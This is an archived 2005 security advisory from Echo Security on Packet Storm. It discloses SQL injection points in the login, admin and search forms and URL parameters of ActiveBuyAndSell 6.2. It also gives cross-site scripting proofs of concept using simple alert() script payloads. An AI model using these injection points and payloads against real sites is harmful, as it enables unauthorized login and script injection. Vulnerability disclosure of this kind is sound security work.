Echo Security Advisory 2005.21

2005-06-25T00:00:00
ID PACKETSTORM:38291
Type packetstorm
Reporter Echo Security
Modified 2005-06-25T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
[ECHO_ADV_21$2005] MUltiple Vulnarable In ActiveBuyAndSell  
---------------------------------------------------------------------------  
  
Author: Dedi Dwianto  
Date: June, 24th 2005  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv21-theday-2005.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : ActiveBuyAndSell  
version : 6.2  
URL : http://ActiveWebSoftwares.com  
Author : ActiveWebSoftwares  
Description :  
  
ActiveBuyAndSell is a Web-based application that connects people selling products   
and services with people looking to buy products and services. Uses MS SQL or   
Access database. Full ASp source code included.  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~  
  
A. SQL Injection:  
  
* http://victim/ebuyandsell/default.asp?catid=[SQL inject]  
  
* http://victim/ebuyandsell/buyersend.asp?catid=[SQL inject]  
  
* http://victim/ebuyandsell/admin.asp  
In this pages vulnarable sql injection in form input  
  
POC :   
Administrator ID :[SQL Inject]  
Password :blank  
  
  
* http://victim/ebuyandsell/advertiserstart.asp  
  
POC :  
E-mail Address :[SQL inject]  
Password :blank  
  
* http://victim/ebuyandsell/buyer.asp  
  
POC :  
E-mail :[SQL inject]  
Password :blank  
  
* http://victim/ebuyandsell/search.asp  
  
POC :  
Keyword :[SQL inject]  
  
  
B. Xss  
  
* http://victim/ebuyandsell/sendpassword.asp?Table=Buyer&Title=[XSS]&EmailFld=BEmail  
  
POC :  
  
http://victim/ebuyandsell/sendpassword.asp?Table=Buyer&Title=<script>alert('test')</script>&EmailFld=BEmail  
  
* http://victim/ebuyandsell/search.asp  
  
POC :  
Keyword : <script>alert('dudul')</script>  
  
  
C. Fix  
  
Vendor allready contacted but still no response and i can't fix it because  
i can't view source code :lol  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous  
~ Lieur Euy , MSR  
~ newbie_hacker@yahoogroups.com ,  
~ #e-c-h-o@DALNET  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
the_day || echo|staff || the_day[at]echo[dot]or[dot]id  
Homepage: http://theday.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`